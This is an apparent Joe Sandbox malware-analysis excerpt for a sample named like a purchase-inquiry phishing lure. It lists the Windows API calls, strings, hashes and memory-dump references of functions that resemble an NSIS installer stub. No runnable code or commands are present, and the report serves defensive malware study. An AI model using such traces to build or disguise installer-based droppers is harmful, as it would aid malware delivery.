                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                    • String ID: \*.*
                                                                    • API String ID: 2035342205-1173974218
                                                                    • Opcode ID: b22725c9d1379137a20526b6b5dca3a9dfa803cbd6e10eb7e01ed1832fa3af48
                                                                    • Instruction ID: b6454d918ebd5faba2d20934ef042a1c7892e73fe5aa147b237895e66f915a66
                                                                    • Opcode Fuzzy Hash: b22725c9d1379137a20526b6b5dca3a9dfa803cbd6e10eb7e01ed1832fa3af48
                                                                    • Instruction Fuzzy Hash: 0041BF71900A14FACB21AB658C89EBF7678EB41768F10817BF801751D1D77C4981DEAE
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
                                                                    • Instruction ID: 8bf6f29b28aad36262c5774fab9fc5fc8376212b20b0a75e389b428f0a59168b
                                                                    • Opcode Fuzzy Hash: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
                                                                    • Instruction Fuzzy Hash: B5F16571D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A9ACF44
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(75C43420,00425738,00424EF0,00405B1F,00424EF0,00424EF0,00000000,00424EF0,00424EF0,75C43420,?,00436800,0040582B,?,75C43420,00436800), ref: 00406368
                                                                    • FindClose.KERNEL32(00000000), ref: 00406374
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID: 8WB
                                                                    • API String ID: 2295610775-3088156181
                                                                    • Opcode ID: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
                                                                    • Instruction ID: 8488419dd32d28aa1913c95702376fed147eab6209e3de196541cdf70887181d
                                                                    • Opcode Fuzzy Hash: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
                                                                    • Instruction Fuzzy Hash: BED01231949120ABC31417786D0C88B7A599F553317218E33F82AF53E0C3348C2586E9
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405316
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405325
                                                                    • GetClientRect.USER32(?,?), ref: 00405362
                                                                    • GetSystemMetrics.USER32(00000002), ref: 00405369
                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040538A
                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040539B
                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053AE
                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053BC
                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053CF
                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004053F1
                                                                    • ShowWindow.USER32(?,00000008), ref: 00405405
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405426
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405436
                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040544F
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040545B
                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405334
                                                                      • Part of subcall function 00404113: SendMessageW.USER32(00000028,?,00000001,00403F3F), ref: 00404121
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405478
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000524C,00000000), ref: 00405486
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040548D
                                                                    • ShowWindow.USER32(00000000), ref: 004054B1
                                                                    • ShowWindow.USER32(?,00000008), ref: 004054B6
                                                                    • ShowWindow.USER32(00000008), ref: 00405500
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405534
                                                                    • CreatePopupMenu.USER32 ref: 00405545
                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405559
                                                                    • GetWindowRect.USER32(?,?), ref: 00405579
                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405592
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055CA
                                                                    • OpenClipboard.USER32(00000000), ref: 004055DA
                                                                    • EmptyClipboard.USER32 ref: 004055E0
                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004055EC
                                                                    • GlobalLock.KERNEL32(00000000), ref: 004055F6
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040560A
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040562A
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405635
                                                                    • CloseClipboard.USER32 ref: 0040563B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                    • String ID: `7~v0}${$&B
                                                                    • API String ID: 590372296-3824033341
                                                                    • Opcode ID: 94329a2446787e458264516a02e4cd75579e620ce323967de0f368c62f847a1a
                                                                    • Instruction ID: b072520f5ee80a331e4e918265d0c1a5052efaeab479527f9264255038cc5675
                                                                    • Opcode Fuzzy Hash: 94329a2446787e458264516a02e4cd75579e620ce323967de0f368c62f847a1a
                                                                    • Instruction Fuzzy Hash: BDB13B71900208FFDB219F60DD89AAE7B79FB44355F10803AFA01B61A0C7755E92DF69
                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C42
                                                                    • ShowWindow.USER32(?), ref: 00403C5F
                                                                    • DestroyWindow.USER32 ref: 00403C73
                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403C8F
                                                                    • GetDlgItem.USER32(?,?), ref: 00403CB0
                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC4
                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403CCB
                                                                    • GetDlgItem.USER32(?,00000001), ref: 00403D79
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403D83
                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00403D9D
                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403DEE
                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403E94
                                                                    • ShowWindow.USER32(00000000,?), ref: 00403EB5
                                                                    • EnableWindow.USER32(?,?), ref: 00403EC7
                                                                    • EnableWindow.USER32(?,?), ref: 00403EE2
                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403EF8
                                                                    • EnableMenuItem.USER32(00000000), ref: 00403EFF
                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F17
                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F2A
                                                                    • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 00403F53
                                                                    • SetWindowTextW.USER32(?,004226E8), ref: 00403F67
                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040409B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                    • String ID: `7~v0}$&B
                                                                    • API String ID: 184305955-3569327651
                                                                    • Opcode ID: 7ec5d6d8830c14dd6c59fcd4d740f7405b1c3e71a87f8c2d624ec054901d1d72
                                                                    • Instruction ID: 95f6c8bb4d7d19f6e547f96282e94f2ad2b423d9adc133d8208fe863fff8d237
                                                                    • Opcode Fuzzy Hash: 7ec5d6d8830c14dd6c59fcd4d740f7405b1c3e71a87f8c2d624ec054901d1d72
                                                                    • Instruction Fuzzy Hash: 6CC1A071A04204BBDB316F61ED85E2B3AA8FB95705F40053EF601B11F1C779A892DB2E
                                                                    APIs
                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404319
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040432D
                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040434A
                                                                    • GetSysColor.USER32(?), ref: 0040435B
                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404369
                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404377
                                                                    • lstrlenW.KERNEL32(?), ref: 0040437C
                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404389
                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040439E
                                                                    • GetDlgItem.USER32(?,0000040A), ref: 004043F7
                                                                    • SendMessageW.USER32(00000000), ref: 004043FE
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404429
                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040446C
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 0040447A
                                                                    • SetCursor.USER32(00000000), ref: 0040447D
                                                                    • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 00404492
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040449E
                                                                    • SetCursor.USER32(00000000), ref: 004044A1
                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004044D0
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004044E2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                    • String ID: N$`7~v0}$open
                                                                    • API String ID: 3615053054-1965545990
                                                                    • Opcode ID: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
                                                                    • Instruction ID: 22110145f907261e11c2f5d787c062fb689e5c30422f2648b08f84481e86c76f
                                                                    • Opcode Fuzzy Hash: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
                                                                    • Instruction Fuzzy Hash: 567184B1900209BFDB109F60DD45B6A7B69FB94354F00843AFB01BA2D0C778AD51DFA9
                                                                    APIs
                                                                      • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                                                      • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                                    • lstrcatW.KERNEL32(00436000,004226E8), ref: 004038E4
                                                                    • lstrlenW.KERNEL32(004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,75C43420), ref: 00403964
                                                                    • lstrcmpiW.KERNEL32(00427198,.exe,004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403977
                                                                    • GetFileAttributesW.KERNEL32(004271A0), ref: 00403982
                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 004039CB
                                                                      • Part of subcall function 00405F61: wsprintfW.USER32 ref: 00405F6E
                                                                    • RegisterClassW.USER32(004281A0), ref: 00403A08
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A20
                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A55
                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403A8B
                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403AB7
                                                                    • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403AC4
                                                                    • RegisterClassW.USER32(004281A0), ref: 00403ACD
                                                                    • DialogBoxParamW.USER32(?,00000000,00403C06,00000000), ref: 00403AEC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                                    • API String ID: 1975747703-1918744475
                                                                    • Opcode ID: 4f9dca51b01f2e9a68abb90b62d3cff5debdd425081f11f9f2c149d9481a9570
                                                                    • Instruction ID: f2be8ff4b94e14f841e527fec55e0dfc0b13ef39e818ed8fa25aa33126975f24
                                                                    • Opcode Fuzzy Hash: 4f9dca51b01f2e9a68abb90b62d3cff5debdd425081f11f9f2c149d9481a9570
                                                                    • Instruction Fuzzy Hash: 6661C670644300BAD720AF669D46F3B3A6CEB84749F40457FF941B62E2D7785902CA7E
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                    • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                    • String ID: F
                                                                    • API String ID: 941294808-1304234792
                                                                    • Opcode ID: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
                                                                    • Instruction ID: 0e42b5f20bdf07c2dc1b789da504779860c4ba9591388ef730275887389fb1b0
                                                                    • Opcode Fuzzy Hash: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
                                                                    • Instruction Fuzzy Hash: 0C418A71804249AFCF058FA5DD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                                    APIs
                                                                    • lstrcpyW.KERNEL32(00425D88,NUL), ref: 00405D58
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00405EDC,?,?), ref: 00405D7C
                                                                    • GetShortPathNameW.KERNEL32(?,00425D88,00000400), ref: 00405D85
                                                                      • Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
                                                                      • Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96
                                                                    • GetShortPathNameW.KERNEL32(00426588,00426588,00000400), ref: 00405DA2
                                                                    • wsprintfA.USER32 ref: 00405DC0
                                                                    • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405DFB
                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E0A
                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E42
                                                                    • SetFilePointer.KERNEL32(00409558,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409558,00000000,[Rename],00000000,00000000,00000000), ref: 00405E98
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00405EA9
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EB0
                                                                      • Part of subcall function 00405BEF: GetFileAttributesW.KERNEL32(00000003,00402E2E,00437800,80000000,00000003,?,?,00434000,00403500,?), ref: 00405BF3
                                                                      • Part of subcall function 00405BEF: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00434000,00403500,?), ref: 00405C15
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                    • String ID: %ls=%ls$NUL$[Rename]
                                                                    • API String ID: 222337774-899692902
                                                                    • Opcode ID: fead4649acd3605223ce044578c367a532c9712ac73623ad44c2f3d2ee62ccb9
                                                                    • Instruction ID: 320379bf9b7b256e7873fa455d25e0b3442936e7d724c6c18c2d1b17e2228676
                                                                    • Opcode Fuzzy Hash: fead4649acd3605223ce044578c367a532c9712ac73623ad44c2f3d2ee62ccb9
                                                                    • Instruction Fuzzy Hash: CF31FF31A04B14BFD2216B659C49F6B3A5CDF41759F14043ABA41F62D3EA3CAA008ABD
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003FB), ref: 004045C8
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 004045F2
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 004046A3
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 004046AE
                                                                    • lstrcmpiW.KERNEL32(004271A0,004226E8,00000000,?,?), ref: 004046E0
                                                                    • lstrcatW.KERNEL32(?,004271A0), ref: 004046EC
                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046FE
                                                                      • Part of subcall function 00405743: GetDlgItemTextW.USER32(?,?,00000400,00404735), ref: 00405756
                                                                      • Part of subcall function 004062AE: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75C43420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406311
                                                                      • Part of subcall function 004062AE: CharNextW.USER32(?,?,?,00000000), ref: 00406320
                                                                      • Part of subcall function 004062AE: CharNextW.USER32(?,00000000,75C43420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406325
                                                                      • Part of subcall function 004062AE: CharPrevW.USER32(?,?,75C43420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406338
                                                                    • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000001,004206B8,?,?,000003FB,?), ref: 004047C1
                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047DC
                                                                      • Part of subcall function 00404935: lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
                                                                      • Part of subcall function 00404935: wsprintfW.USER32 ref: 004049DF
                                                                      • Part of subcall function 00404935: SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: A$&B
                                                                    • API String ID: 2624150263-2586977930
                                                                    • Opcode ID: 833f58d89de2f81fb1f01f1908bf740233fe299cde34ef739fcabdfbf8a79f2f
                                                                    • Instruction ID: 0d30bce32a668ce4acefc1b856fca7f6450f1747cfb7256993ff8e50c76d0062
                                                                    • Opcode Fuzzy Hash: 833f58d89de2f81fb1f01f1908bf740233fe299cde34ef739fcabdfbf8a79f2f
                                                                    • Instruction Fuzzy Hash: 9BA170B1900218AFDB11AFA5DD85AAF77B8EF85314F10843BFA01B62D1D77C89418B6D
                                                                    APIs
                                                                    • GetVersion.KERNEL32(00000000,004216C8,?,004051B0,004216C8,00000000,00000000,?), ref: 004060FF
                                                                    • GetSystemDirectoryW.KERNEL32(004271A0,00000400), ref: 0040617D
                                                                    • GetWindowsDirectoryW.KERNEL32(004271A0,00000400), ref: 00406190
                                                                    • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061CC
                                                                    • SHGetPathFromIDListW.SHELL32(?,004271A0), ref: 004061DA
                                                                    • CoTaskMemFree.OLE32(?), ref: 004061E5
                                                                    • lstrcatW.KERNEL32(004271A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406209
                                                                    • lstrlenW.KERNEL32(004271A0,00000000,004216C8,?,004051B0,004216C8,00000000,00000000,?), ref: 00406263
                                                                    Strings
                                                                    • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406203
                                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040614B
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                    • API String ID: 900638850-730719616
                                                                    • Opcode ID: 72ae88432d73e88ed5369f503f10eb86e637b299afe91f447cbcbe3ad5255a4c
                                                                    • Instruction ID: f6a8a8a7a7034b932088a9542e42f1195f789c387e9fc15d08c952313e2c7fd4
                                                                    • Opcode Fuzzy Hash: 72ae88432d73e88ed5369f503f10eb86e637b299afe91f447cbcbe3ad5255a4c
                                                                    • Instruction Fuzzy Hash: 5C612671A00105EBDF209F64CC40AAE37A5BF51314F52817FE916BA2E1D73D8AA2CB5D
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00402DFF
                                                                    • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400,?,?,00434000,00403500,?), ref: 00402E1B
                                                                      • Part of subcall function 00405BEF: GetFileAttributesW.KERNEL32(00000003,00402E2E,00437800,80000000,00000003,?,?,00434000,00403500,?), ref: 00405BF3
                                                                      • Part of subcall function 00405BEF: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00434000,00403500,?), ref: 00405C15
